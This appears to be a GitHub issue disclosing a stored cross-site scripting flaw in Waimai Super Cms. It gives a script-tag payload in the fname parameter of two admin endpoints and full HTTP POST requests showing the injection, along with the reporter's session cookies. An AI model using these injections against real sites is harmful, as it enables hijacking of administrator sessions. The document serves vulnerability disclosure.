You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
xss Vulnerability in Waimai Super Cms
In waimai Super Cms master, there is an XSS vulnerability via the /admin.php/Food/addsave and /admin.php/Food/editsave fname parameter.
xss Vulnerability in Waimai Super Cms
In waimai Super Cms master, there is an XSS vulnerability via the /admin.php/Food/addsave and /admin.php/Food/editsave fname parameter.
Payload:<script>alert(20);</script>
Exploit URL / Algorithm:
#1
POST /xxx/waimaicmsn/waimai-master/admin.php?m=Food&a=addsave HTTP/1.1
Host: xx.x.x.x:xxx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.8.4.2:xxx/xxx/waimaicmsn/waimai-master/admin.php?m=Food&a=add
Cookie: wp-settings-time-1=1538144068; MEIQIA_EXTRA_TRACK_ID=1AQGRuGqHc3T7uIyeIsHTrWf1Mz; Hm_lvt_12fc28a048b3367aa46f20380b6678ff=1537438993,1538029069,1538142984; PHPSESSID=eu0e287boau61i75im4stoosc2; INTELLI_569865769d=3a45337e2cd3e1125dd42f9387ef0609; __atuvc=3%7C41; __tins__16868462=%7B%22sid%22%3A%201539063191636%2C%20%22vd%22%3A%201%2C%20%22expires%22%3A%201539064991636%7D; 51cke=; 51laig=1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=--------1708972804
Content-Length: 551
----------1708972804
Content-Disposition: form-data; name="fname"
sample<script>alert(2);</script>
----------1708972804
Content-Disposition: form-data; name="fcid"
19
----------1708972804
Content-Disposition: form-data; name="pic"; filename=""
Content-Type: application/octet-stream
----------1708972804
Content-Disposition: form-data; name="fprice"
1
----------1708972804
Content-Disposition: form-data; name="fcontent"
sss
----------1708972804
Content-Disposition: form-data; name="fsort"
0
----------1708972804--
#2
POST /sug/waimaicmsn/waimai-master/admin.php?m=Food&a=editsave HTTP/1.1
Host: 10.8.4.2:xxx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://xx.x.x.x:xxx/xxx/waimaicmsn/waimai-master/admin.php?m=Food&a=edit&id=90
Cookie: wp-settings-time-1=1538144068; MEIQIA_EXTRA_TRACK_ID=1AQGRuGqHc3T7uIyeIsHTrWf1Mz; Hm_lvt_12fc28a048b3367aa46f20380b6678ff=1537438993,1538029069,1538142984; PHPSESSID=eu0e287boau61i75im4stoosc2; INTELLI_569865769d=3a45337e2cd3e1125dd42f9387ef0609; __atuvc=3%7C41; __tins__16868462=%7B%22sid%22%3A%201539063191636%2C%20%22vd%22%3A%201%2C%20%22expires%22%3A%201539064991636%7D; 51cke=; 51laig=1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------141470576471630910151028888
Content-Length: 912
-----------------------------141470576471630910151028888
Content-Disposition: form-data; name="fname"
furf<script>alert(20);</script>
-----------------------------141470576471630910151028888
Content-Disposition: form-data; name="fid"
90
-----------------------------141470576471630910151028888
Content-Disposition: form-data; name="fcid"
19
-----------------------------141470576471630910151028888
Content-Disposition: form-data; name="pic"; filename=""
Content-Type: application/octet-stream
-----------------------------141470576471630910151028888
Content-Disposition: form-data; name="fprice"
0.00
-----------------------------141470576471630910151028888
Content-Disposition: form-data; name="fcontent"
dsdd
-----------------------------141470576471630910151028888
Content-Disposition: form-data; name="fsort"
0
-----------------------------141470576471630910151028888--
The text was updated successfully, but these errors were encountered: